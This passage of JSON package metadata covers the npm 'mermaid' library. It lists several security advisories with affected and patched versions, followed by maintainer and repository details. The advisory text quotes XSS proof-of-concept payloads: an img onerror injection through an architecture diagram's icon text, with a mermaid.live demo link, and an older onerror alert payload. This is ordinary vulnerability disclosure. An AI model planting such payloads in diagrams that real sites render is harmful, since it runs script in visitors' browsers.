.append('div')\n        .html(service.iconText); // \u003c- iconText passed into innerHTML\n       /** ... **/\n};\n};\n```\n\nThis issue was introduced with 734bde38777c9190a5a72e96421c83424442d4e4, around 15 months ago, which was released in [v11.1.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.1.0).\n\n### PoC\nRender the following diagram and observe the modified DOM.\n\n```\narchitecture-beta\n    group api(cloud)[API]\n    service db \"\u003cimg src=x onerror=\\\"document.write(`xss on ${document.domain}`)\\\"\u003e\" [Database] in api\n```\n\nHere is a PoC on mermaid.live: https://mermaid.live/edit#pako:eNo9T8FOwzAM_ZXI4rBJpWrpRtuIISF24caZZdKyxOsiLUnlJjCo-u9kQ8wX-_n5-dkjKK8ROEhSRxNQhUh4v8cghWMpOvKxZ7I3M3XyUc83L-9v2z9qQPo0CpneMwFPxnZsILU6M--QyNNKCAHaq2jRhfyL0vLZ7jwMiWd3443Q3krjpt38Mv4sgG3WMsi9HHDLjLs4CwcZdGQ08EARM7BISZMgjJdLBIQjWhTAU6nxIOMpCBBuSrJeug_v7b8yPdMdgR_kaUgo9loGXBvZkbS3LqHTSK8-ugC8LMrrEuAjnIEvlnlVL9q6rZu6Lh-rRQbfwKuyyZuybcvqIaWiqKcMfq6uRd7Uy-kXhYFzcA\n\n### Impact\nXSS on all sites that use mermaid and render user supplied diagrams without further sanitization.\n\n### Remediation\nSanitize the value of `iconText` before passing it to `html()`.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-08-19T20:16:45.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N","references":["https://github.com/mermaid-js/mermaid/security/advisories/GHSA-8gwm-58g9-j8pw","https://nvd.nist.gov/vuln/detail/CVE-2025-54880","https://github.com/mermaid-js/mermaid/commit/2aa83302795183ea5c65caec3da1edd6cb4791fc","https://github.com/mermaid-js/mermaid/commit/734bde38777c9190a5a72e96421c83424442d4e4","https://github.com/advisories/GHSA-8gwm-58g9-j8pw"],"source_kind":"github","identifiers":["GHSA-8gwm-58g9-j8pw","CVE-2025-54880"],"repository_url":"https://github.com/mermaid-js/mermaid","blast_radius":21.055001063575556,"created_at":"2025-08-19T21:09:52.545Z","updated_at":"2025-08-20T19:13:28.000Z","epss_percentage":0.00049,"epss_percentile":0.14791,"packages":[{"ecosystem":"npm","package_name":"mermaid","versions":[{"first_patched_version":"11.10.0","vulnerable_version_range":"\u003e= 11.1.0, \u003c 11.10.0"}],"purl":"pkg:npm/mermaid","statistics":{"dependent_packages_count":554,"dependent_repos_count":13441,"downloads":5839200,"downloads_period":"last-month"},"affected_versions":["11.1.0","11.1.1","11.2.0","11.2.1","11.3.0","11.4.0","11.4.1","11.5.0","11.6.0","11.7.0","11.8.0","11.8.1","11.9.0"],"unaffected_versions":["0.2.11","0.2.12","0.2.13","0.2.14","0.2.15","0.2.16","0.3.0","0.3.2","0.3.3","0.3.4","0.3.5","0.4.0","0.5.0","0.5.1","0.5.2","0.5.3","0.5.4","0.5.5","0.5.6","0.5.7","0.5.8","6.0.0","7.0.0","7.0.1","7.0.2","7.0.3","7.0.4","7.0.5","7.0.6","7.0.7","7.0.8","7.0.9","7.0.10","7.0.11","7.0.12","7.0.13","7.0.14","7.0.15","7.0.16","7.0.17","7.0.18","7.1.0","7.1.1","7.1.2","8.0.0","8.1.0","8.2.1","8.2.2","8.2.3","8.2.4","8.2.5","8.2.6","8.3.0","8.3.1","8.4.0","8.4.1","8.4.2","8.4.3","8.4.4","8.4.5","8.4.6","8.4.7","8.4.8","8.5.0","8.5.1","8.5.2","8.6.0","8.6.1","8.6.2","8.6.3","8.6.4","8.7.0","8.8.0","8.8.1","8.8.2","8.8.3","8.8.4","8.9.0","8.9.1","8.9.2","8.9.3","8.10.1","8.10.2","8.11.0","8.11.1","8.11.2","8.11.3","8.11.4","8.11.5","8.12.0","8.12.1","8.13.0","8.13.1","8.13.2","8.13.3","8.13.4","8.13.5","8.13.6","8.13.7","8.13.8","8.13.9","8.13.10","8.14.0","9.0.0","9.0.1","9.1.0","9.1.1","9.1.2","9.1.3","9.1.4","9.1.5","9.1.6","9.1.7","9.2.0","9.2.1","9.2.2","9.3.0","9.4.0","9.4.2","9.4.3","10.0.0","10.0.1","10.0.2","10.1.0","10.2.0","10.2.1","10.2.2","10.2.3","10.2.4","10.3.0","10.3.1","10.4.0","10.5.0","10.5.1","10.6.0","10.6.1","10.7.0","10.8.0","10.9.0","10.9.1","10.9.2","10.9.3","11.0.0","11.0.1","11.0.2","11.10.0"]}]},{"uuid":"GSA_kwCzR0hTQS1wM3JwLXZtajktZ3Y2ds0g-Q","url":"https://github.com/advisories/GHSA-p3rp-vmj9-gv6v","title":"Incorrect sanitisation function leads to `XSS` in mermaid","description":"### Impact\nMalicious diagrams can contain javascript code that can be run at diagram readers machines.\n\n### Patches\nThe users should upgrade to version 8.13.8\n\n### Workarounds\nYou need to upgrade in order to avoid this issue.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-01-06T19:45:59.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/mermaid-js/mermaid/security/advisories/GHSA-p3rp-vmj9-gv6v","https://nvd.nist.gov/vuln/detail/CVE-2021-43861","https://github.com/mermaid-js/mermaid/commit/066b7a0d0bda274d94a2f2d21e4323dab5776d83","https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","https://github.com/advisories/GHSA-p3rp-vmj9-gv6v"],"source_kind":"github","identifiers":["GHSA-p3rp-vmj9-gv6v","CVE-2021-43861"],"repository_url":"https://github.com/mermaid-js/mermaid","blast_radius":0.0,"created_at":"2022-12-21T16:12:39.288Z","updated_at":"2023-02-03T05:04:06.000Z","epss_percentage":0.00493,"epss_percentile":0.64751,"packages":[{"ecosystem":"npm","package_name":"mermaid","versions":[{"first_patched_version":"8.13.8","vulnerable_version_range":"\u003c 8.13.8"}],"purl":"pkg:npm/mermaid","statistics":{"dependent_packages_count":554,"dependent_repos_count":13441,"downloads":5839200,"downloads_period":"last-month"},"affected_versions":["0.2.11","0.2.12","0.2.13","0.2.14","0.2.15","0.2.16","0.3.0","0.3.2","0.3.3","0.3.4","0.3.5","0.4.0","0.5.0","0.5.1","0.5.2","0.5.3","0.5.4","0.5.5","0.5.6","0.5.7","0.5.8","6.0.0","7.0.0","7.0.1","7.0.2","7.0.3","7.0.4","7.0.5","7.0.6","7.0.7","7.0.8","7.0.9","7.0.10","7.0.11","7.0.12","7.0.13","7.0.14","7.0.15","7.0.16","7.0.17","7.0.18","7.1.0","7.1.1","7.1.2","8.0.0","8.1.0","8.2.1","8.2.2","8.2.3","8.2.4","8.2.5","8.2.6","8.3.0","8.3.1","8.4.0","8.4.1","8.4.2","8.4.3","8.4.4","8.4.5","8.4.6","8.4.7","8.4.8","8.5.0","8.5.1","8.5.2","8.6.0","8.6.1","8.6.2","8.6.3","8.6.4","8.7.0","8.8.0","8.8.1","8.8.2","8.8.3","8.8.4","8.9.0","8.9.1","8.9.2","8.9.3","8.10.1","8.10.2","8.11.0","8.11.1","8.11.2","8.11.3","8.11.4","8.11.5","8.12.0","8.12.1","8.13.0","8.13.1","8.13.2","8.13.3","8.13.4","8.13.5","8.13.6","8.13.7"],"unaffected_versions":["8.13.8","8.13.9","8.13.10","8.14.0","9.0.0","9.0.1","9.1.0","9.1.1","9.1.2","9.1.3","9.1.4","9.1.5","9.1.6","9.1.7","9.2.0","9.2.1","9.2.2","9.3.0","9.4.0","9.4.2","9.4.3","10.0.0","10.0.1","10.0.2","10.1.0","10.2.0","10.2.1","10.2.2","10.2.3","10.2.4","10.3.0","10.3.1","10.4.0","10.5.0","10.5.1","10.6.0","10.6.1","10.7.0","10.8.0","10.9.0","10.9.1","10.9.2","10.9.3","11.0.0","11.0.1","11.0.2","11.1.0","11.1.1","11.2.0","11.2.1","11.3.0","11.4.0","11.4.1","11.5.0","11.6.0","11.7.0","11.8.0","11.8.1","11.9.0","11.10.0"]}]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXczMmctNWhxcC1nZzZx","url":"https://github.com/advisories/GHSA-w32g-5hqp-gg6q","title":"Cross-Site Scripting in mermaid","description":"Versions of `mermaid` prior to 8.2.3 are vulnerable to Cross-Site Scripting. If malicious input  such as `A[\"\u003cimg src=invalid onerror=alert('XSS')\u003e\u003c/img\u003e\"] ` is provided to the application, it will execute the code instead of rendering it as text due to improper output encoding.\n\n\n## Recommendation\n\nUpgrade to version 8.2.3 or later","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2020-09-02T15:41:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/knsv/mermaid/issues/847","https://www.npmjs.com/advisories/751","https://github.com/advisories/GHSA-w32g-5hqp-gg6q"],"source_kind":"github","identifiers":["GHSA-w32g-5hqp-gg6q"],"repository_url":"https://github.com/knsv/mermaid","blast_radius":0.0,"created_at":"2022-12-21T16:13:19.130Z","updated_at":"2023-01-09T05:03:54.000Z","epss_percentage":null,"epss_percentile":null,"packages":[{"ecosystem":"npm","package_name":"mermaid","versions":[{"first_patched_version":"8.2.3","vulnerable_version_range":"\u003c 8.2.3"}],"purl":"pkg:npm/mermaid","statistics":{"dependent_packages_count":554,"dependent_repos_count":13441,"downloads":5839200,"downloads_period":"last-month"},"affected_versions":["0.2.11","0.2.12","0.2.13","0.2.14","0.2.15","0.2.16","0.3.0","0.3.2","0.3.3","0.3.4","0.3.5","0.4.0","0.5.0","0.5.1","0.5.2","0.5.3","0.5.4","0.5.5","0.5.6","0.5.7","0.5.8","6.0.0","7.0.0","7.0.1","7.0.2","7.0.3","7.0.4","7.0.5","7.0.6","7.0.7","7.0.8","7.0.9","7.0.10","7.0.11","7.0.12","7.0.13","7.0.14","7.0.15","7.0.16","7.0.17","7.0.18","7.1.0","7.1.1","7.1.2","8.0.0","8.1.0","8.2.1","8.2.2"],"unaffected_versions":["8.2.3","8.2.4","8.2.5","8.2.6","8.3.0","8.3.1","8.4.0","8.4.1","8.4.2","8.4.3","8.4.4","8.4.5","8.4.6","8.4.7","8.4.8","8.5.0","8.5.1","8.5.2","8.6.0","8.6.1","8.6.2","8.6.3","8.6.4","8.7.0","8.8.0","8.8.1","8.8.2","8.8.3","8.8.4","8.9.0","8.9.1","8.9.2","8.9.3","8.10.1","8.10.2","8.11.0","8.11.1","8.11.2","8.11.3","8.11.4","8.11.5","8.12.0","8.12.1","8.13.0","8.13.1","8.13.2","8.13.3","8.13.4","8.13.5","8.13.6","8.13.7","8.13.8","8.13.9","8.13.10","8.14.0","9.0.0","9.0.1","9.1.0","9.1.1","9.1.2","9.1.3","9.1.4","9.1.5","9.1.6","9.1.7","9.2.0","9.2.1","9.2.2","9.3.0","9.4.0","9.4.2","9.4.3","10.0.0","10.0.1","10.0.2","10.1.0","10.2.0","10.2.1","10.2.2","10.2.3","10.2.4","10.3.0","10.3.1","10.4.0","10.5.0","10.5.1","10.6.0","10.6.1","10.7.0","10.8.0","10.9.0","10.9.1","10.9.2","10.9.3","11.0.0","11.0.1","11.0.2","11.1.0","11.1.1","11.2.0","11.2.1","11.3.0","11.4.0","11.4.1","11.5.0","11.6.0","11.7.0","11.8.0","11.8.1","11.9.0","11.10.0"]}]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTRmNngtNDlnMi05OWZt","url":"https://github.com/advisories/GHSA-4f6x-49g2-99fm","title":"Cross-site Scripting in Mermaid","description":"Mermaid before 8.11.0 allows XSS when the antiscript feature is used.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2021-12-10T18:57:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://nvd.nist.gov/vuln/detail/CVE-2021-35513","https://github.com/mermaid-js/mermaid/issues/2122","https://github.com/mermaid-js/mermaid/pull/2123","https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e","https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","https://github.com/advisories/GHSA-4f6x-49g2-99fm"],"source_kind":"github","identifiers":["GHSA-4f6x-49g2-99fm","CVE-2021-35513"],"repository_url":"https://github.com/mermaid-js/mermaid","blast_radius":0.0,"created_at":"2022-12-21T16:12:58.206Z","updated_at":"2023-02-01T05:06:10.000Z","epss_percentage":0.00307,"epss_percentile":0.53519,"packages":[{"ecosystem":"npm","package_name":"mermaid","versions":[{"first_patched_version":"8.11.0","vulnerable_version_range":"\u003c 8.11.0"}],"purl":"pkg:npm/mermaid","statistics":{"dependent_packages_count":554,"dependent_repos_count":13441,"downloads":5839200,"downloads_period":"last-month"},"affected_versions":["0.2.11","0.2.12","0.2.13","0.2.14","0.2.15","0.2.16","0.3.0","0.3.2","0.3.3","0.3.4","0.3.5","0.4.0","0.5.0","0.5.1","0.5.2","0.5.3","0.5.4","0.5.5","0.5.6","0.5.7","0.5.8","6.0.0","7.0.0","7.0.1","7.0.2","7.0.3","7.0.4","7.0.5","7.0.6","7.0.7","7.0.8","7.0.9","7.0.10","7.0.11","7.0.12","7.0.13","7.0.14","7.0.15","7.0.16","7.0.17","7.0.18","7.1.0","7.1.1","7.1.2","8.0.0","8.1.0","8.2.1","8.2.2","8.2.3","8.2.4","8.2.5","8.2.6","8.3.0","8.3.1","8.4.0","8.4.1","8.4.2","8.4.3","8.4.4","8.4.5","8.4.6","8.4.7","8.4.8","8.5.0","8.5.1","8.5.2","8.6.0","8.6.1","8.6.2","8.6.3","8.6.4","8.7.0","8.8.0","8.8.1","8.8.2","8.8.3","8.8.4","8.9.0","8.9.1","8.9.2","8.9.3","8.10.1","8.10.2"],"unaffected_versions":["8.11.0","8.11.1","8.11.2","8.11.3","8.11.4","8.11.5","8.12.0","8.12.1","8.13.0","8.13.1","8.13.2","8.13.3","8.13.4","8.13.5","8.13.6","8.13.7","8.13.8","8.13.9","8.13.10","8.14.0","9.0.0","9.0.1","9.1.0","9.1.1","9.1.2","9.1.3","9.1.4","9.1.5","9.1.6","9.1.7","9.2.0","9.2.1","9.2.2","9.3.0","9.4.0","9.4.2","9.4.3","10.0.0","10.0.1","10.0.2","10.1.0","10.2.0","10.2.1","10.2.2","10.2.3","10.2.4","10.3.0","10.3.1","10.4.0","10.5.0","10.5.1","10.6.0","10.6.1","10.7.0","10.8.0","10.9.0","10.9.1","10.9.2","10.9.3","11.0.0","11.0.1","11.0.2","11.1.0","11.1.1","11.2.0","11.2.1","11.3.0","11.4.0","11.4.1","11.5.0","11.6.0","11.7.0","11.8.0","11.8.1","11.9.0","11.10.0"]}]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/mermaid","docker_dependents_count":307,"docker_downloads_count":1708311770,"usage_url":"https://repos.ecosyste.ms/usage/npm/mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/mermaid/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2024-09-05T20:22:57.610Z","issues_count":1486,"pull_requests_count":1008,"avg_time_to_close_issue":36729669.49814815,"avg_time_to_close_pull_request":1435074.2296476306,"issues_closed_count":535,"pull_requests_closed_count":821,"pull_request_authors_count":216,"issue_authors_count":817,"avg_comments_per_issue":4.588156123822342,"avg_comments_per_pull_request":3.636904761904762,"merged_pull_requests_count":711,"bot_issues_count":1,"bot_pull_requests_count":134,"past_year_issues_count":483,"past_year_pull_requests_count":565,"past_year_avg_time_to_close_issue":2089930.248275862,"past_year_avg_time_to_close_pull_request":1129220.8771551724,"past_year_issues_closed_count":144,"past_year_pull_requests_closed_count":463,"past_year_pull_request_authors_count":165,"past_year_issue_authors_count":340,"past_year_avg_comments_per_issue":1.3850931677018634,"past_year_avg_comments_per_pull_request":3.5150442477876105,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":111,"past_year_merged_pull_requests_count":385,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"Yokozuna59","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"knsv","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yash-Singh1","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"GDFaber","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"NicolasNewman","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"ashishjain0512","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"},{"login":"yari-dewalt","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"}],"active_maintainers":[{"login":"sidharthv96","count":102,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yash-Singh1","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"Yokozuna59","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"NicolasNewman","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"yari-dewalt","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid/related_packages","maintainers":[{"uuid":"sidv","login":"sidv","name":null,"email":"npmjs@sidharth.dev","url":null,"packages_count":20,"html_url":"https://www.npmjs.com/~sidv","role":null,"created_at":"2022-11-23T03:03:24.459Z","updated_at":"2022-11-23T03:03:24.459Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sidv/packages"},{"uuid":"knsv","login":"knsv","name":null,"email":"knsv@sveido.com","url":null,"packages_count":13,"html_url":"https://www.npmjs.com/~knsv","role":null,"created_at":"2022-11-14T17:29:19.163Z","updated_at":"2022-11-14T17:29:19.163Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/knsv/packages"},{"uuid":"ashishjain0512","login":"ashishjain0512","name":null,"email":"ashishjain0512@gmail.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~ashishjain0512","role":null,"created_at":"2022-11-14T17:29:19.152Z","updated_at":"2022-11-14T17:29:19.152Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ashishjain0512/packages"},{"uuid":"p_brolin47","login":"p_brolin47","name":null,"email":"per@mermaidchart.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~p_brolin47","role":null,"created_at":"2022-11-14T17:29:19.123Z","updated_at":"2022-11-14T17:29:19.123Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/p_brolin47/packages"},{"uuid":"aloisklink","login":"aloisklink","name":null,"email":"alois@aloisklink.com","url":null,"packages_count":15,"html_url":"https://www.npmjs.com/~aloisklink","role":null,"created_at":"2023-12-13T21:18:10.887Z","updated_at":"2023-12-13T21:18:10.887Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aloisklink/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":10831776,"name":"@mermaid-js/layout-elk","ecosystem":"npm","description":"ELK layout engine for mermaid","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","elk","mermaid"],"namespace":"mermaid-js","versions_count":11,"first_release_published_at":"2024-08-23T12:27:00.940Z","latest_release_published_at":"2025-09-04T15:08:07.065Z","latest_release_number":"0.2.0","last_synced_at":"2025-09-04T15:10:40.869Z","created_at":"2024-08-23T14:18:05.056Z","updated_at":"2025-09-04T15:10:41.270Z","registry_url":"https://www.npmjs.com/package/@mermaid-js/layout-elk","install_command":"npm install @mermaid-js/layout-elk","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.2.0"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2024-04-13T18:33:07.000Z","size":230370,"stargazers_count":66655,"open_issues_count":923,"forks_count":5722,"subscribers_count":632,"default_branch":"develop","last_synced_at":"2024-04-13T21:00:44.868Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2024-04-15T07:05:02.865Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":5515,"total_committers":513,"mean_commits":"10.750487329434698","dds":0.8814143245693563,"last_synced_commit":"56ec1ab52ce15ca7dbe76a3acbe1cb68acb13b2d"},"previous_names":["knsv/mermaid"],"tags_count":137,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":217480218,"owners_count":16183547,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/h